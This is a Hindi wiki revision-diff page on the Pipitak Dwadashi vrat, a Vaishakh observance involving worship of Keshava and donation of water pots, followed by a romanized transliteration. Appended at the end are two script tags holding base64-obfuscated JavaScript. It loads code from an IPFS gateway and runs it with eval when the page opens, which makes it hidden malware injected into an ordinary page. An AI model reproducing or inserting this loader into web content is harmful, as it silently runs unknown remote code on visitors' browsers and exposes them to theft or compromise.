Difference between revisions of "पिपीतक द्वादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[वैशाख]] [[शुक्ल पक्ष]] की द्वादशी पर यह व्रत आरम्भ होता है।  
 
*[[वैशाख]] [[शुक्ल पक्ष]] की द्वादशी पर यह व्रत आरम्भ होता है।  
 
*केशव की प्रतिमा को शीतल जल से नहलाना तथा गंध, पुष्प आदि उपचारों से पूजा की जाती है।
 
*केशव की प्रतिमा को शीतल जल से नहलाना तथा गंध, पुष्प आदि उपचारों से पूजा की जाती है।
Line 5: Line 5:
 
*दूसरे वर्ष में इसी प्रकार 8 घड़ों, तीसरे वर्ष में 12 घड़ों, चौथे वर्ष में 16 घड़ों का दान दिया जाता है।
 
*दूसरे वर्ष में इसी प्रकार 8 घड़ों, तीसरे वर्ष में 12 घड़ों, चौथे वर्ष में 16 घड़ों का दान दिया जाता है।
 
*सोने की दक्षिणा भी दी जाती है।
 
*सोने की दक्षिणा भी दी जाती है।
*पिपीतक नामक ब्राह्मण के नाम से विख्यात है।<ref>व्रतकालविवेक (19-20); वर्षक्रियाकौमुदी (252-258); तिथितत्व (114)।</ref>
+
*पिपीतक नामक ब्राह्मण के नाम से विख्यात है।<ref>व्रतकालविवेक (19-20); वर्षक्रियाकौमुदी (252-258); तिथितत्त्व (114)।</ref>
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 09:54, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • vaishakh shukl paksh ki dvadashi par yah vrat arambh hota hai.
  • keshav ki pratima ko shital jal se nahalana tatha gandh, pushp adi upacharoan se pooja ki jati hai.
  • pratham varsh mean char jalapoorn gh doan ka dan diya jata hai.
  • doosare varsh mean isi prakar 8 gh doan, tisare varsh mean 12 gh doan, chauthe varsh mean 16 gh doan ka dan diya jata hai.
  • sone ki dakshina bhi di jati hai.
  • pipitak namak brahman ke nam se vikhyat hai.[1]


tika tippani aur sandarbh

  1. vratakalavivek (19-20); varshakriyakaumudi (252-258); tithitattv (114).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>